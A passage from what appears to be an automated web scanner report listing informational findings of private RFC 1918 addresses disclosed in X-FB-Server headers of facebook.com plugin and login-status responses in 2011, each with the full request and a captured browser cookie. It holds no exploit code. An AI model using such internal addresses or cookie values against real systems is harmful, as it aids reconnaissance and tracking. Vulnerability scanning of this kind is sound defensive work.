GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df236319ad8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff99472368%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e252031%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff99472368%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ff173d2%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df135aae92%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff99472368%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ff173d2&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a2371c4c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff99472368%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ff173d2&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df276039c8c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff99472368%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ff173d2&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.50.119
X-Cnection: close
Date: Thu, 16 Jun 2011 13:53:20 GMT
Content-Length: 22

Invalid Application ID

19.711. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.53.61

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3023f20f%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff356d7ba3c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df396377c84%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff356d7ba3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df227ace974%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe7c0ab04%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff356d7ba3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df227ace974&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df44f7299c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff356d7ba3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df227ace974&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20ad137c8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff356d7ba3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df227ace974&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.53.61
X-Cnection: close
Date: Thu, 16 Jun 2011 17:30:26 GMT
Content-Length: 22

Invalid Application ID

19.712. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.189.52

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d7000528%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffe69f3b88%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb8f6ffd8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffe69f3b88%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13f90208%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32d2e3c4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffe69f3b88%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13f90208&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e297f134%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffe69f3b88%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13f90208&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df14b5c9ef4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffe69f3b88%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13f90208&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.189.52
X-Cnection: close
Date: Thu, 16 Jun 2011 18:01:27 GMT
Content-Length: 22

Invalid Application ID

19.713. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.68.62

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df336375b58%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2517c53d%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1eafcfebc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2517c53d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b9b37334%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df177fa2a1%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2517c53d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b9b37334&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ade1565%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2517c53d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b9b37334&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df24f67ecc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2517c53d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b9b37334&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.68.62
X-Cnection: close
Date: Thu, 16 Jun 2011 12:20:16 GMT
Content-Length: 22

Invalid Application ID

19.714. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.182.34

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df122793474%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb16b3e24%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34425d548%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb16b3e24%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df72a3806c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df167b6846%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb16b3e24%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df72a3806c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1097fc25%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb16b3e24%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df72a3806c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36ec583f8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb16b3e24%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df72a3806c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.182.34
X-Cnection: close
Date: Thu, 16 Jun 2011 13:22:21 GMT
Content-Length: 22

Invalid Application ID

19.715. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.144.61

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df343fad964%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffac3ba548%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.716. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.96.42

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb5c3e2ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff350bfd74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.717. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.204.49

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27367b4d8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f3e598%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.718. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.6.35

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39c0348ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff28a44e6b4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.719. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.190.49

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3736394e4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1de4dacf4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.720. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.89.61

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FRadiumOne%2F113084648745200%3Fv%3Dpage_getting_started&layout=standard&show_faces=false&width=450&action=like&font=arial&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://radiumone.com/mobile/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.721. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.180.33

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8c21b14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f3e598%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.722. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.137.43

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d1bef9%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff112cf8d98%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.723. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.194.47

Request

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a9f93ec4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Fvideo%2F10-most-affordable-10-most-expensive-home-markets%2F716B48DB-AE22-440C-BB99-3102EC1163C5.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.724. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.26.39

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df110125f2%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff21d29845c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.725. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.203.47

Request

